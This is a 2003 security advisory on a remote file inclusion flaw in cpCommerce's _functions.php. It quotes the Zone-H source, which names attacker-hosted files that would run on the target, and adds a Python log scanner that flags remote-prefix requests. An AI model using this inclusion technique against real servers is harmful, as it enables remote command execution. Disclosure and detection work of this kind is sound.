cpCommerce Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Target System
SecurityTracker Alert ID: 1007957
SecurityTracker URL: http://securitytracker.com/id/1007957
Date: Oct 20 2003
Execution of arbitrary code via network, User access via network
Vendor Confirmed: Yes
Exploit Included: Yes
Zone-H reported an include file vulnerability in cpCommerce. A remote user can execute arbitrary commands on the target server.
The _functions.php file includes files whose paths are built from the $prefix variable. A remote user can set $prefix to a remote location, causing files of the remote user's choosing to be included and executed on the target server.
A demonstration exploit URL is provided:
PHP code, including operating system commands, in the remote file will be executed on the target system. The code will run with the privileges of the target web server process.
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web server.
No solution was available at the time of this entry.
The vendor had reportedly issued a fix at the following URL, but at the time of this entry, the vendor had retracted the fix as well as the entire web site:
Vendor URL: cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
Input validation error
Linux (Any), UNIX (Any), Windows (Any)
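With no fix available, one thing a defender can do is review web server access logs for requests that hand _functions.php a remote location. The following is an added example, not part of the advisory or of cpCommerce; it assumes common/combined log format and that the variable is supplied as a query parameter named `prefix`, and its log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme (http://, ftp://, php://, data:) or a //host or \\host path.
REMOTE = re.compile(r'^(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def remote_prefix(log_line, script="_functions.php", param="prefix"):
    """Return the decoded `param` value if the line requests `script` with a
    remote-looking value, else None. The parameter name is an assumption."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    # The web server percent-decodes the path once before mapping it to a file.
    if not unquote(url.path).lower().endswith("/" + script):
        return None
    # parse_qsl decodes each value once, as PHP does when it fills the variable.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == param and REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Return (client address, offending value) for every flagged log line."""
    hits = []
    for line in lines:
        value = remote_prefix(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample entries (documentation addresses and .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Oct/2003:10:01:02 +0200] "GET /shop/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [20/Oct/2003:10:02:41 +0200] "GET /shop/_functions.php?prefix=http://files.example.invalid/index HTTP/1.0" 200 312',
    '198.51.100.7 - - [20/Oct/2003:10:02:55 +0200] "GET /shop/_functions%2Ephp?x=1&prefix=ftp%3A%2F%2Ffiles.example.invalid%2Findex HTTP/1.0" 200 298',
    '192.0.2.10 - - [20/Oct/2003:10:03:10 +0200] "GET /shop/_functions.php?prefix=index HTTP/1.0" 200 0',
    '192.0.2.44 - - [20/Oct/2003:10:04:00 +0200] "GET /shop/search.php?q=prefix=http://a.example.invalid/ HTTP/1.0" 200 880',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} requested _functions.php with remote prefix {value!r}")
```

Access logs record only the query string, so a value sent in a POST body or a cookie would not show up in this scan.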
Source Message Contents
Date: Sun, 19 Oct 2003 12:11:17 +0200
Subject: ZH2003-31SA (security advisory): file inclusion vulnerability in
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
Published: 19 October 2003
Name: cpCommerce
Affected Versions: 0.05f (and other versions?)
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based."
There's a file inclusion vulnerability in the _functions.php file, lines 13-14:
It is possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.
The patch is available here:
Fix the script with the patch proposed by the author.
Link to original article here:
Astharot - Zone-H Admin
http://www.zone-h.org - email@example.com
PGP Key: http://www.gife.org/astharot.asc
Linux User #292132